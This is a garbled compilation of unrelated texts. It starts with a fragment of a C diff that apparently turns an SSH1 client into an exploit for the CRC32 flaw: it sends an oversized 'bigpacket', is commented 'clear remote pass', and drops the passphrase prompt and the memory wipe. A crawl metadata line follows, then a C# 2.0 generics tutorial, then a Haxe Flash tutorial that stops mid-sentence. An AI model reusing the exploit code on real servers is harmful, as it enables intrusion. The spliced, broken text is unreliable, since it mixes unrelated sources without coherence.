+ debug("sshd accepted 0xffff msg");
+ if (type != SSH_SMSG_FAILURE)
+ debug("sshd bounced 0xffff msg !!!");
+
+// clear remote pass :-)
+ bigpacket();
+
for (i = 0; i < options.number_of_password_prompts; i++) {
if (i != 0)
error("Permission denied, please try again.");
- password = read_passphrase(prompt, 0);
packet_start(SSH_CMSG_AUTH_PASSWORD);
packet_put_string(password, strlen(password));
- memset(password, 0, strlen(password));
- xfree(password);
packet_send();
packet_write_wait();
Yes, I'm continously looking for a very good job... | http://packetstormsecurity.org/files/24347/ssh1.crc32.txt.html | crawl-003 | refinedweb | 4,065 | 59.84 |
Updated on Kisan Patel
The .Net Framework provides a number of APIs for working with XML data. LINQ to XML is the API for processing the XML document.
LINQ to XML provides an extensive collection of classes for a variety of purposes. These classes reside in the
System.Xml.Linq namespace from the
System.Xml.Linq.dll assembly. Here, some of the most commonly used classes from this hierarchy.
The XNode abstract class represents a node of an XML tree. The XContainer, XText, XComment, and XProcessingInstruction classes inherit from the XNode class. The XContainer class in turn acts as a base class for the XDocument and XElement classes. As you might have guessed, these classes represent a text node, comment, processing instruction, XML document, and element, respectively.
The classes such as XAttribute, XComment, XCData, and XDeclaration are independent of the XNode hierarchy and represent attribute, comment, CDATA section, and XML declaration, respectively. The XName class represents the name of an element (XElement) or attribute (XAttribute). Similarly, the XNamespace class represents a namespace of an element or attribute.
LINQ to XML comprises two things.
Now, let’s move on to take a look at a LINQ to XML example and find student names from an XML file. LINQ to XML loads an XML document into a query-able XElement type and then IEnumerable loads the query results, and using a foreach loop, we access it.
students.xml
<?xml version="1.0" encoding="utf-8" ?> <students> <student id="1"> <name>Kisan</name> <city>Ladol</city> </student> <student id="2"> <name>Ravi</name> <city>Vijapur</city> </student> <student id="3"> <name>Ujas</name> <city>Ladol</city> </student> <student id="4"> <name>Ketul</name> <city>Ladol</city> </student> </students>
Program.cs
using System; using System.Collections.Generic; using System.Linq; using System.Xml.Linq; namespace ConsoleApp { class Program { static void Main(string[] args) { //Load XML File XElement xmlFile = XElement.Load(@"c:\students.xml"); //Query Creation IEnumerable students = from s in xmlFile.Elements("student").Elements("name") select s; //Execute Query foreach (string student in students) { Console.WriteLine(student); } } } }
Above program produce following output.
As Seen in above example, LINQ to XML offers a slightly different syntax that operates on XML data, allowing query and data manipulation. | http://csharpcode.org/blog/linq-to-xml/ | CC-MAIN-2019-18 | refinedweb | 371 | 50.43 |
Templatizing Github "Template Repos"
Adding the (obvious) missing feature to Github Template Repositories
. Template Repositories are a convenient way to allow users to clone a codebase without having to
git clone and remove the Git local repository (i.e.
.git).
However, this is where the utility of Github Template Repositories ends.
In my mind, the whole purpose of a "template repository" is to allow users to easily customize the repo for their own use. Unfortunately, Github does not offer any kind of mechanism for substituting placeholders with our own values (there is actually no real concept of a placeholder with Template Repositories).
There are many viable frameworks project scaffolding frameworks around, and if you are comfortable with one, please use it. I don't think many of them work well with Github Templates since you are starting with an existing codebase (not generating one). I also prefer a simple solution that doesn't take a ton of headspace to use. My requirements are simple:
- Use placeholders in files that can be substituted from a template file.
- Preserve the file structure of the template repo (having to use a flat file structure sucks).
- Don't have a lot of special rules (like sacred directories, naming schemes, etc.).
- Make the process easily repeatable (should you screw up the process).
- Gracefully clean up the template scaffolding.
Solution
Assuming you have
tree and
gomplate installed locally, start with a simple script called
customize:
#!/usr/bin/env bash ignore_files=".git|node_modules|_templates|customize|README.md" for input_file in `tree -I "${ignore_files}" -Ffai --noreport` do if [ ! -d "${input_file}" ]; then echo "Processing file: ${input_file}" gomplate \ -f "${input_file}" \ -o "${input_file}" \ --left-delim "<<[" \ --right-delim "]>>" \ -c cus=./customize.json fi done # Clean up / implode rm README.md mv README_TEMPLATE.md README.md mv github .github rm customize
Basically, this script uses
tree to get the hierarchy of files in the project directory (ignoring files use the pattern
ignore_files), and treats every file as a template to be rendered. If there are no template variables, there will be no changes (at least in terms of
.git hashing -- though the file will be rewritten). If the file does have "placeholders", the placeholders will be rendered when the file is rewritten to disk.
In my setup, I use an unusual placeholder syntax:
<<[ variable ]>> (as represented by the
--left-delim and
--right-delim arguments). I do this to prevent collisions with code-based templating ( (for instance, Github Actions uses
${{ variable }} and Handlebars uses
{{ variable }}).
Data is sourced from the file
customize.json, which is also located in the root of the project:
{ "foo": "bar", "nesting": { "is": { "ok": true } } }
The script argument
-c cus=./customize.json is used by
gomplate to create a "context,"
which is simply a helpful way to namespace variables. Using the existing example, you can access the variables in
customize.json using the following placeholders:
<<[ .cus.foo ]>> and
<<[ .cus.nesting.is.ok ]>>. If you don't like the prefix
.cus, you can change it to whatever you desire:
-c <context-name>=./customize.json.
gomplatehas many other data source strategies and utility methods. I recommend checking out the utility's documentation (which is excellent).
Finally, the
customize script uses the "implode" pattern (most people know it from Create React App) where files are moved to their correct places in the file structure and scaffolding is deleted. I use this especially for the
.github directory because I don't want a templatized version of Github Actions running whenever commits are made to the template repo. I also tend to have two
README.md documents. One describes how to use the template repo, and the other is the templatized version of the
README.md that will remain after
customize is ran.
Conclusion
Github Template Repositories are a great tool for allowing developers to clone and customize repositories, but the process has some deficiencies that can be addressed very simply with a templating technology and some
bash. The
customize script (above) is what we use at Peachjar for customizing new microservice and microapp projects from our "starter kits" (all Github Template Repositories). Hopefully, this will inspire you to create similar template repositories for use within your own project or organization.
You might also be interested in these articles...
Stumbling my way through the great wastelands of enterprise software development. | https://rclayton.silvrback.com/templatizing-github-template-repos | CC-MAIN-2021-17 | refinedweb | 715 | 56.55 |
User talk:Un-MadMax/Archive
From Uncyclopedia, the content-free encyclopedia
Benifits
See? another benifit of logging in, you can move pages! Cheers. PS: I am not sure, but {{subcat|Categoryname}} might be the preferred method for categorizing categories. --Splaka 01:20, 22 Oct 2005 (UTC)
Plemptates Templates
I see you messing up my wilde templates. If you could, leave templates alone. Reason being that they are on many pages, and if you mess one up, you could potentially screw up a hundred+ different pages. Thanks for reverting your changes.
Sir Famine, Gun ♣ Petition » 02:16, 22 Oct 2005 (UTC)
- Hey - it's really no big deal. I appreciate that you took the time to revert your changes. A lot of people don't, and then I get really irritable. As it is, you made it onto my good list by cleaning up your mess and replying civily. That and the World Monocle Wearing Championship Wilde quote is fantastic. Nice work all around.
Sir Famine, Gun ♣ Petition » 00:41, 25 Oct 2005 (UTC)
Ban
Had to ban some aol again, holler if you need it lifted. Is there a way you can disable the random element of aol's proxy browser? Or get any other ISP at all? *grin* --Splaka 06:23, 23 Oct 2005 (UTC)
Poland
Your map is great, but we need english version, too. ;p --MaDeR 20:22, 24 Oct 2005 (UTC)
If you can't find proper place for your damn article about Bogdan Raczynski, then it is your problem. Maybe your article is not so good?
Uncyclopedian of the Month
That's right, all your hard work is about to pay off BIG TIME. --—rc (t) 00:58, 25 Oct 2005 (UTC)
Zombie Jesus
The offered screenshot sounds hot, Max. go for it!--Sarducci 13:17, 2?) --
Sir BobBobBob ! S ? [rox!|sux!]
23:05, 4 Nov 2005 (UTC)
Grovels
Could I beg you to, when in the mood for linkification, possibly help out a couple of my articles that are poorly linked and categorized? I'm nearly helpless in this respect...
I specifically need help with I Can't Believe It's Not Hitler and Eva Perón, though all my children usually need help, since I stink at the linkification of my articles.
Thanks!
» Brig Sir Dawg | t | v | c » 12:39, 7 Nov 2005 (UTC)
Vanity2
I created the template because I thought it would be funny for certain pages that obviously werent vanity to have a vanity template. I only ended up putting it on Satan. So since only one page needs it, I will move it to out of the template namespace. No need to QVFD it, I can deal with it. Thanks for pointing it out to me. --Paulgb 21:13, 9 Nov 2005 (UTC)
- Oh, I misunderstood the question. I thought you wanted to QVFD the template to get rid of it. Feel free to use the template however you like. --Paulgb 21:21, 9 Nov 2005 (UTC)
Templates Category
I noticed that you added all the [[Awards/]] templates to the templates category. The problem with this is that once the pages with the templates on them start to get edited, all the user pages will also go in the Template category. Is this what you wanted to do? I havn't reverted because I wasn't sure. The Awards category works the same way. --Paulgb 22:16, 14 Nov 2005 (UTC)
- When we upgrade to 1.5 we can put them in the templates with and they won't show when the template is used. Until then they probably should not get categories. --Splaka 23:23, 14 Nov 2005 (UTC)
Feed me
Hello, there! I was wondering if you, with all your categorizing might, might stick the new Feedback page somewheres, or at least recommend some categories in which I could stick it? I will have to redo the image once it is categorized, so perhaps just some recommendations would do. I would be aplentifully thankful! --Skyscraper 15:28, 14 Dec 2005 (UTC)
- I'll tell you where to stick it - You're BANNED!!! How's that for service with a smile, eh? Now my secret's finally out - I'm an artist. Like a mime. Just a lot louder, and without the crazy face-paint. Yessirreee.
Sir Famine, Gun ♣ Petition » 00:50, 15 Dec 2005 (UTC)
Thanks! --Skyscraper
- I mean, really, when you ask someone where to stick something, what do you expect? Had I had access to the super-secret, "stick it to the man" admin button, I'd have used that. Lacking that technology, I used my ban stick. Not to be confused with the ED Slogan: "Could you pull this pointed, beetle-laden stick out of my ass?" Which I personally think is one of the funniest slogans on this site. And on the topic of said stick, you seem to be lacking one quite seriously. Sure this site is for you? The six senses are welcome here, but not the 7th, humor.
Sir Famine, Gun ♣ Petition » 02:55, 16 Dec 2005 (UTC)
- The thanks was directed at MadMax (note the lack of indent) for categorizing Feedback for me. Also, out of respect for MadMax's talk page, you are welcome to repost the above message on my talk page and we can continue to bicker there. --Skyscraper 04:39, 16 Dec 2005 (UTC)
Wrestling
wrestling?? 130.111.98.244 20:00, 20 Dec 2005 (UTC) like??
Max is Mad!
Max is Mad! new to UN!
whats up with you and Uma? 130.111.98.244 20:56, 20 Dec 2005 (UTC)
Skull and Bones
Thanks for cleaning up "Skull and Bones" for me, I'm new here, and still getting the hang of things! :) | http://uncyclopedia.wikia.com/wiki/User_talk:MadMax/Archive?oldid=2030417 | CC-MAIN-2015-35 | refinedweb | 960 | 83.56 |
UrbanYodaMembers
Content Count5
Joined
Last visited
Community Reputation1 Newbie
About UrbanYoda
- RankNewbie
- React is a fussy beast. Importing without being able to confirm the script being loaded just wasn't working for me.
- UPDATE: It turns out React was rendering before the plugin was fully loaded. My basic useScript custom hook needed to be fleshed out a bit more, so I swapped it out for the useScript hook from, which contains loading and error variables. With this, I was able to run the animation once I was sure the script was in memory. With those changes, everything is now working properly. Here's my updated code: import useScript from './hooks/useScript' //component containing SVG import TestComponent from 'components/TestComponent' const App = () => { // plugin lives in /public folder const [loaded, error] = useScript('/DrawSVGPlugin.min.js') return ( <div> { loaded && <TestComponent/> } </div> ) } export default TestComponent
- So, I was able to get this working after @OSUblake's suggestion to console.log out the plugins. Turns out placing the script in the HTML wasn't loading (React was resolving the wrong path even though the script and HTML live in the same directory...still haven't figured out why), so I expanded on @elegantseagulls' idea and created a custom hook called useScript to dynamically load the script in my component: useScript.js: import { useEffect } from 'react'; const useScript = url => { useEffect(() => { const script = document.createElement('script'); script.src = url; script.async = true; document.body.appendChild(script); return () => { document.body.removeChild(script); } }, [url]); }; export default useScript; Using hook in component: import useScript from './hooks/useScript' const TestComponent = () => { // plugin lives in /public folder useScript('/DrawSVGPlugin.min.js') ... } export default TestComponent Now the script is loading and all is almost good. I'm having a pesky bug where the SVG animation doesn't work on the first render, but after clicking back then forward in the browser, it works perfectly. I'm pretty sure this is a state management issue on my end, so I'm going to restructure and test later. Will keep you posted on my results. Again, a sincere thanks to everyone for their input 😀.
- Oh, I had no idea that was the case with the Club GreenSock membership! Now I know...I'll have to upgrade soon. No need to convince me...I've been a huge GSAP fan for years. However, aside from that, I'm actually using v2.1.3 of NPM GSAP, so everything is version 2.x. Does that add enough information to clarify my question?
- UrbanYoda started following Using GSAP 2.x paid plugins with React
Using GSAP 2.x paid plugins with React
UrbanYoda posted a topic in GSAPHi! | https://greensock.com/profile/79072-urbanyoda/ | CC-MAIN-2020-16 | refinedweb | 439 | 59.6 |
Need for notification mailing lists
I found several people looking for a way to implement post-only mailing lists with GNU Mailman. However, I couldn’t find solutions that are described in sufficient detail.
In particular, this type of list is useful for notification mailing lists. In Free Electrons’ case, whenever someone pushes commits to our public git trees, a notification e-mail is sent. Sometimes, internal discussions can follow, but we do not wish to make them public. This is why we do not want the list e-mail address to be shown in the messages that are sent. If the list address doesn’t appear in the
To,
CC or in
Reply-To headers, members who are authorized to post messages without moderation won’t post replies to the list by mistake by using the “Reply to all” functionality of their e-mail client.
The problem is that the current version of GNU Mailman doesn’t support this type of list yet, at least with the parameters in the list administration interface. You can turn on the “Full personalization” option, which will send messages to each member individually, so that the list address doesn’t appear in the
To header. You can also customize the
Reply-To header, to an address that is different from the list address. However, the
CC header will still hard-code the list address.
A possibility is to hack the
/usr/lib/mailman/Mailman/Handlers/CookHeaders.py file, but this solution would apply to all the lists at once, and the changes you could make may interfere with Mailman updates. A much nice solution is to extend Mailman, to modify its behavior for specific mailing lists.
A working solution
This solution is based on explanations given on the Mailman wiki, and was implemented on Ubuntu 12.04.
First, create a
list-test mailing list. Some of the commands below will assume that you named your new list this way. Now, go to its administration interface and enable “Full Personalization” in “Non-digest” options. In “General options”, in the “Reply-To: header munging” section, specify a reply-to address.
If you send a test message to your new list, you will see that the list address is still in the CC header of the message that you receive.
Now, create a
RemoveCC.py file in the
Handlers directory (
/usr/lib/mailman/Mailman/Handlers/RemoveCC.py on Ubuntu 12.04):
# Your comments here """Remove CC header in post-only mailing lists This is to avoid unmoderated members to reply to messages, making their replies public. Replies should instead go to a private list. """ def process(mlist, msg, msgdata): del msg['Cc']
This will be yet another filter the list messages will go through. Now compile this file in the directory where you put it:
pycompile RemoveCC.py
The next thing to do is to modify the default filter pipeline for your new list. You can do it by creating a
/var/lib/mailman/lists/list-test/extend.py file with the below contents:
import copy from Mailman import mm_cfg def extend(mlist): mlist.pipeline = copy.copy(mm_cfg.GLOBAL_PIPELINE) # The next line inserts MyHandler after CookHeaders. mlist.pipeline.insert(mlist.pipeline.index('CookHeaders') + 1, 'RemoveCC')
This will add your new filter right after the
CookHeaders one. To enable this, you have to run:
/usr/sbin/config_list -i /var/lib/mailman/lists/list-test/extend.py list-test
You can now send a new test message, and you will see that the CC header is now gone.
Notes
- Of course, you can reuse the same
extend.pyfile for multiple mailing lists. However, the solution doesn’t work if you don’t put the file inside
/var/lib/mailman/lists/list-name(distributions other than Ubuntu 12.04 may have different paths).
- I didn’t manage to undo this change. The Mailman wiki gives a solution based on creating a file containing
del mlist.pipelineand running
/usr/sbin/config_list -i this-file list-name, but it didn’t work for me. Please post a comment below if you find a way to implement this, and return to “factory” settings.
- Don’t hesitate to share other ways of implementing this kind of functionality! | https://bootlin.com/blog/author/mike/page/3/ | CC-MAIN-2018-17 | refinedweb | 704 | 56.76 |
Decoupling Techniques: How Do I Get That Rubber Band in the Middle?
How do you know when a system is tightly coupled or not? In this post, I discuss why it's so important to decouple your code and how to identify and fix the problems.
Every developer is looking for that holy grail of an ultimate software system that is entirely decoupled.
There are a number of ways to decouple a system. However, if you don't have the experience to identify one, it may take some years to immediately know when a website or system is tightly coupled.
Custom applications can look like our rubber band ball shown above. I need the rubber band (method) from the middle and I don't know how to get it?
Today's post discusses how to identify if a system is too tightly coupled and make it more open.
Take it From The Top
When a system is tightly coupled, it describes the relationship between two entities (usually classes) in a software system. If one class knows too much about the other class, it's considered tightly coupled.
When class A starts to know too much about class B, then it's time to start examining the code.
But how do you know if a system is tightly coupled or not?
Tips for Decoupling Software
Take a handful of developers and throw them into a room and based on experience, every one of them will have a different way of decoupling the software.
Here are some tips on what to look for when identifying whether code is tightly coupled or not.
Internal or Sealed Access Modifiers
Internal access modifiers are accessible only within files in the same assembly where sealed access modifiers are classes that prevent other classes from inheriting from it.
Over my years of development, I have never used Internal or Sealed (yes, I know what they do).
In my opinion, if you have one, it causes some issues. If you have both (an internal and a sealed), it just makes matters worse.
Let's say you have this piece of code (don't laugh...this is in production...somewhere):
internal sealed class Address { public string Address1 { get; set; } public string Address2 { get; set; } public string City { get; set; } public string State { get; set; } public string Zip { get; set; } public string Country { get; set; } }
Joe-programmer comes in on his first day on the job and has to inherit to make a new Address class. How do you fix this issue without modifying the class and ruining all of the unit tests?
You work around it. You build a wrapper, add an interface to make it less decoupled, and hide the workings of the Address implementation until you can refactor it later.
public class PolicyAddress: IPolicyAddress { private Address _address; public PolicyAddress() { _address = new Address(); } public string Name { get; set; } public string Address1 { get { return _address.Address1; } set { _address.Address1 = value; } } public string Address2 { get { return _address.Address2; } set { _address.Address2 = value; } } public string City { get { return _address.City; } set { _address.City = value; } } public string State { get { return _address.State; } set { _address.State = value; } } public string Zip { get { return _address.Zip; } set { _address.Zip = value; } } public string Country { get { return _address.Country; } set { _address.Country = value; } } } public interface IPolicyAddress { string Name { get; set; } string Address1 { get; set; } string Address2 { get; set; } string City { get; set; } string State { get; set; } string Zip { get; set; } string Country { get; set; } }
While this isn't the best approach, it gets the class built and is workable until a better refactoring can happen (hopefully in the not-too-distant future). ;-)
Dependency Injection (DI) or Inversion of Control (IoC)
Lately, this has been the mantra of every developer worth their salt. I mentioned a while back that I was using a Dependency Injection library called Ninject, but after some interesting news about performance issues, I'm moving towards StructureMap now.
In my opinion, dependency injection can be described in two words: Decoupled Factories. Any DI library can immediately enhance your development so long as you are following the rules of development by using interfaces.
The idea behind DI is that you are letting your DI library know how to create an instance of an object by telling it which interfaces are attached to which concrete classes.
There is the drawback of having no interfaces in your code. If you don't have interfaces in your code, then you really don't need...no, can't use, dependency injection.
Simpler (and smarter) Access to Objects
Have you ever seen this code before?
Order.Customer.Address.City
This code violates the Law of Demeter. The Law of Demeter for functions requires that a method m of an object O may only invoke the methods of the following kinds of objects:
- O itself
- m's parameters
- Any objects created/instantiated within m
- O's direct component objects
- A global variable, accessible by O, in the scope of m
So if we follow our guidelines and refactor the example above, we come up with:
var name = Order.GetCity();
The general rule is to only "Use one dot."
If you need a more concrete example, I would recommend reading The Paperboy, The Wallet, and the Law of Demeter (pdf).
Unit Tests
I've said before that unit tests show more than just a red/green passing grade. Write your unit tests like you are writing production code. Envision how you see the code working and write it as such in your unit tests.
When you're developing an application, unit tests can show you how simple or how complex you can build a system.
Once you have those concepts in your unit tests (and they pass), you can transfer the concept over to real code...and the best part is that your code is all ready to go because it's been tested.
Conclusion
As you can see, there are many ways to take existing code and refactor it into something more usable.
I see programmers with 15 to 20 years of experience expanding their career path even further by adding new skills of identifying and refactoring coupled software into flexible, easily maintainable code for future reuse.
Decoupling and refactoring software will become more of a required talent.
Do you have any more techniques on how to decouple software? Post them in the comments below. | https://www.danylkoweb.com/Blog/decoupling-techniques-how-do-i-get-that-rubber-band-in-the-middle-BH | CC-MAIN-2017-26 | refinedweb | 1,064 | 63.19 |
We are going to take a look at a new cool feature of C# 2.0. It is not constrained to C# but also available with other .NET languages.
As the projects get more complicated, programmers increasingly need a means to better reuse and customize their existing component-based software. To achieve such a high level of code reuse in other languages, programmers typically employ a feature called Generics. Using Generics, we can create class templates that support any type. When we instantiate that class, we specify the type we want to use, and from that point on, our object is "locked in" to the type we chose.
Let us look at an example of how we can create a generic class using C# 2.0.
public class MyCustomList<MYTYPE> { private ArrayList m_list = new ArrayList(); public int Add(myType value) { return m_list.Add(value); } public void Remove(myType value) { m_list.Remove(value); } public myType this[int index] { get { return (myType)m_list[index]; } set { m_list[index] = value; } } }
Here,
MyCustomList is built on an
ArrayList. But its methods and indexer are strongly typed. Here
<myType> is really just a placeholder for whatever type you choose when you create the class. This placeholder is defined in angled brackets after the name of the class. Now, let us look at how to create an instance of the class
MyCustomList:
MyCustomList<int> list = new MyCustomList<int>(); // Add two integers to list
list.Add(1); list.Add(33); // The next statement will fail and wont compile list.Add("Emp");
If we want our
MyCustomList to store strings, it can be done as follows:
MyCustomList<string> list = new MyCustomList<string>();
We can have multiple types in our base template class. Just separate each type with a comma in between the angular brackets.
public class MySecondCustomList<myType,mySecondType> {...}
So far so good.
Now, we will look at applying constraints by which we can restrict what types are allowed. For e.g., if we want to restrict our type to only the types implementing
IDisposable interface, we can do it as follows:
public class MyCustomList<myType> where myType : IDisposable { ... }
If there are more than one constraints, we can separate it by commas. E.g.:
public class MyDictionary<KeyType, ValType> where KeyType : IComparable, KeyType : IEnumerable
Generics are not limited to classes. They can also be used in structures, interfaces, and delegates. We can even use generics to parameterize a method by type. E.g.:
public myType MyGenericFunction<myType>(myType item) { ........ return item; }
In general, Generics allow programmers to author, test, and deploy code once, and then reuse that code for a variety of different data types. In addition, generics are checked at compile-time. When your program instantiates a generic class with a supplied type parameter, the type parameter can only be of the type your program specified in the class definition.
Version 1.0
General
News
Question
Answer
Joke
Rant
Admin | http://www.codeproject.com/KB/cs/gencsharp.aspx | crawl-002 | refinedweb | 482 | 56.35 |
The fastest way is to use the Facebook Page promotion feature, which allows you to target followers in a given demographic location, with more options like age group, sex, etc.
Not creating an ad, I mean the Facebook Page promotion feature...
When on your Facebook page, click 'Promote' at the bottom of the menu on the left of the screen, then select promote your page. This is just one of several methods to promote your page for more followers.
But doesn't that cause Facebook to create ads and display them to the specified audience? (Sorry, that's what I meant by creating an ad).
You also need to be careful as text can only cover a certain percentage of your ad or it will be rejected. I did use them when I had a free coupon but can't honestly say that it made a significant difference. I think you would have to have a sustained campaign which will cost.
I just let my Facebook page grow organically through shares etc. That way, you get more people signing up who are genuinely interested in the topic and fewer people unfollowing/unliking.
Yes it's basically creating an ad promoting your group through a Facebook page. That means you need to create a Facebook Page for your group since you cannot directly promote a Facebook Group to get new relevant followers.
You need to very careful how you use facebook ads (they are rarely called ads for one thing). If you are going to boost a post or whatever, refine the target demographic very precisely.
If you don't, you will get thousands of fake likes overnight and maybe never recover from it.
Fake accounts will 'like' your page for free to cover their tracks when they 'like' pages for money.
You end up with money spent for no return (no real interaction) and a lot of obviously worthless 'likes' which will make your page look spammy.
The minimum cost for a campaign is €100 (about $110 or £90), so I won't be gambling on Facebook ads.
I've been able to do ads for much less than that. I've only tried it twice and both times, it cost me around $20 (Australian). It's just a matter of defining your audience more tightly.
Where did you read that Eubug? My posts regularly come up with offers to boost for £8, £10 or £14.
Actually looking at it again, this limit is a minimum upper spending limit before ads cease.
I've just realised you have a Group, not a Page, right? The advice you've been getting in this thread relates to a Facebook Page, not a Group. Currently there is no way to create a Facebook promotion for a Group.
I assume what you're doing is trying to create an ad through Facebook Business, which is intended for people to promote (obviously) their business. That's massively more expensive.
What you need to do is create a Facebook Page for your website. You don't have to do much with it, but you do need to create a post which links to your Facebook Group. Then you can do a promotion of that post from your Facebook page.
The key to keeping the cost down is to identify your audience. For instance, I have a bellydance website and a Facebook page for that site. The website earns income from eBay affiliate ads - so when I choose Location for my promotion, I choose only those countries where eBay operates. I do get foreign visitors, but for some sites, it might make more sense to choose English-speaking countries only. Next - there are male bellydancers, and there are young bellydancers, but the majority of bellydance enthusiasts are mature women. So I choose an age range appropriately.
Are you getting the picture? You could cast your net wide, but it will cost you more - so aim for the easy targets to keep your costs down.
I actually have both in addition to my personal Facebook account.
I have a Facebook page for the last few years and have been trying to promote it using all the usual methods (made for Pinterest images, targeted DMs on Twitter, signatures on forums etc). The Facebook page also has a pinned post promoting the new group.
The Facebook page is for DIY and gardening, it doesn't link to a specific website, but there are lots of links back here. In addition and not to go overboard on self promotion, I have links to other sites, plus I post tips and photos to keep readers interested. The Facebook group is intended to be a forum for discussing tools. I could probably ask on other forums whether I could promote the group. Some moderators seem to be lenient. Once the number of members reaches a critical level, the membership seems to snowball as members invite other members. (A gardening group I joined a month ago has seen its membership double from 10,000 to over 20,000. I don't know whether they advertise).
I didn't say you weren't allowed to promote a Facebook Group. I'm saying that feature isn't available on Facebook - it's impossible.
If you already have a post pinned on your Facebook page, then here's what you do:
1. Go to that post on your Page and click "Boost Post".
2. On the left hand side of the box that comes up, you'll see "People you choose through targeting". Click "Edit".
3. You'll see you can select gender, age, and locations. Do that. Aim ONLY at the people who are MOST likely to be interested. Don't be tempted to cast your net wide, it's wasting money.
4. Add some keywords in the Demographics box. As you type, you'll see options come up - you need to select from them. Again, use your best keywords ONLY. For instance, I'm targeting people interested in bellydancing. So I choose "bellydance" and "raqs sharqi". I don't choose "dance", because that's too general and will waste my advertising dollars.
5. Now you'll be directed back to the main menu and you can choose the duration of your ad campaign. If it's too expensive, go back and edit your choices to make them more specific.
I just did a trial run on my Page and it quoted me $2 a day.
I've done this a couple of times at weekends (when my audience is most active), but just boosted individual posts. I'll try posting again but this time boost the page itself and the post referencing the new group.
So when you did it before, did you boost the specific post that advertised the group?
Just curious - if the Facebook Page doesn't link to your website or blog, what's the point?
the initial spending may be huge but returns will be for ever if done perfectly
Any more inspiration? A few groups have been sort of ok with me posting links, but I don't want to push my luck. The Write Life10 days ago
Building a Facebook interest/community page with the idea of building as base of followers to deliver content. If you have any worthy articles in the realm of 90's music, drop me a link that I can save. When I get Eugene Brennan2 months ago
What's the best way of doing this? Tweeting doesn't seem to work. DMing all of them would be cool, but bad etiquette and could potentially lead to a banning. rachel carpenter2 years ago
Can we put our Hubs on PAID ads on FB, etc? Yes, I do realize the cost of the ads is more than the how much we get per click. I'm sure I sound crazy.But, seriously, is. | https://hubpages.com/community/forum/142148/whats-the-best-way-of-promoting-a-facebook-group | CC-MAIN-2017-39 | refinedweb | 1,319 | 72.87 |
Difference between revisions of "Jetson/Tutorials/Vision-controlled GPIO"
Revision as of 09:21, 9 January 2015
Contents
Turn an LED on/off based on whether a face is detected by a camera
This tutorial will explain how to detect a face using OpenCV, and how to turn an LED on/off based on whether the face is detected.
Testing your camera
- Connect a USB webcam to the full-sized USB 3.0 port on Jetson TK1 (or into the micro-AB USB 2.0 port through a micro-B to female USB-A adapter).
- If you haven't tried using your webcam on Jetson TK1, check if it works first such as by running this to show the camera preview in a graphical window:
sudo apt-get install luvcview luvcview
(If you can't see the camera stream, then try plugging your webcam into the micro-AB USB 2.0 port through a micro-B to female USB-A adapter, or looking at supported cameras on the Cameras reference page).
- Not all working webcams seem to be supported by openCV, example programs stall with: Corrupt JPEG data: 4 extraneous bytes before marker 0xd9
- Sony PS3 eyecam wfm
Detecting a face using OpenCV
- If you haven't done so already, make sure you have installed the CUDA toolkit and the OpenCV development packages on your device, by following the CUDA tutorial and the OpenCV tutorial.
- Download the OpenCV samples (they come).
- Make your own "faceActivatedGPIO" folder for this project, eg:
mkdir ~/faceActivatedGPIO cd ~/faceActivatedGPIO
- Copy the "cascadeclassifier" face detection sample from OpenCV's GPU-accelerated samples folder and build it:
cp ~/opencv/samples/gpu/cascadeclassifier.cpp . g++ cascadeclassifier cascadeclassifier
- Try running it with your attached webcam:
./cascadeclassifier --cascade ~/opencv-2.4.9/data/haarcascades/haarcascade_frontalface_alt.xml --camera 0
(Hit 'm' to search for just a single face instead of multiple faces, then hit Spacebar if you want to compare CPU vs GPU performance).
In case of difficulty try Testing openCV.
Testing GPIO on Jetson TK1
- If you haven't done so already, follow the GPIO tutorial so that you can manually turn an LED on/off using root-permissions.
- We want to control GPIO from our own code. Download Derek Molloy's SimpleGPIO library and get the 3 source files in the "gpio" folder. eg:
sudo apt-get install git git clone git://github.com/derekmolloy/boneDeviceTree/ mkdir gpio cp ../boneDeviceTree/gpio/*.cpp gpio/. cp ../boneDeviceTree/gpio/*.h gpio/.
- Let's build & run the sample TestApplication to make sure GPIO works. Remember that it must be run with root-permissions in order to access GPIO:
g++ gpio/TestApplication.cpp gpio/SimpleGPIO.cpp -I gpio -o testGPIO sudo ./testGPIO
- You should now be seeing your LED flash several times (or see the voltage going up & down on your multimeter).
Controlling the LED based on face detection results
- Rename "cascadeclassifier.cpp" to "faceActivatedGPIO.cpp", eg:
mv cascadeclassifier.cpp faceActivatedGPIO.cpp
- Now it is just a matter of combining the cascadeclassifier sample code with the SimpleGPIO library. Near the top of the "faceActivatedGPIO.cpp" file, add:
#include "SimpleGPIO.h"
- Then near the bottom of the file after it says imshow("result", frameDisp); (line 277), add this code:
// Turn the LED on or off depending on whether a face was detected or not. const int GPIO_LED = 57; // GPIO_PH1 (Pin 50 on J3A1 of Jetson TK1 board) gpio_export(GPIO_LED); // Start using the LED pin gpio_set_dir(GPIO_LED, OUTPUT_PIN); // The LED is an output if (detections_num > 0) { gpio_set_value(GPIO_LED, HIGH); // Turn the LED on } else { gpio_set_value(GPIO_LED, LOW); // Turn the LED off } gpio_unexport(GPIO_LED); // Stop using the LED pin for now
- Build the project. eg:
g++ faceActivatedGPIO.cpp gpio/SimpleGPIO.cpp -I gpio -o faceActivatedGPIO
- And finally, run the project with root-permissions. eg:
sudo ./faceActivatedGPIO
You should now see your camera preview on your screen, and if your face is detected then your LED should be on, and if not then it should be off!
More ideas
You can improve this project in many ways, such as turning on an electro-mechanical relay that opens a door when a face is detected, instead of just flashing an LED. Or turn multiple LEDs on based on how many faces were detected or their size, by using multiple GPIO pins. And obviously, now that you know how to perform some vision-based GPIO, you could apply the same principles to activate GPIO when the full-body of a person is detected (using OpenCV's HOG sample as explained in the Full Body Detection tutorial) or when a car is detected (using the same HOG or CascadeClassifier code but with an XML file trained for car classification), or thousands of other potential computer vision or software based detections.
This tutorial is also the basis for the vision-controlled robot tutorials such as the SCOL walking robot tutorial. | https://elinux.org/index.php?title=Jetson/Tutorials/Vision-controlled_GPIO&diff=prev&oldid=368066&printable=yes | CC-MAIN-2021-04 | refinedweb | 808 | 51.28 |
Developing Flash applications is really easy with Haxe. Let's look at our first code sample. This is a basic example showing most of the toolchain.
Create a new folder and save this class as
Main.hx.
import flash.Lib; import flash.display.Shape; class Main { static function main() { var stage = Lib.current.stage; // create a center aligned rounded gray square var shape = new Shape(); shape.graphics.beginFill(0x333333); shape.graphics.drawRoundRect(0, 0, 100, 100, 10); shape.x = (stage.stageWidth - 100) / 2; shape.y = (stage.stageHeight - 100) / 2; stage.addChild(shape); } }
To compile this, either run the following from the command line:
haxe -swf main-flash.swf -main Main -swf-version 15 -swf-header 960:640:60:f68712
Another possibility is to create and run (double-click) a file called
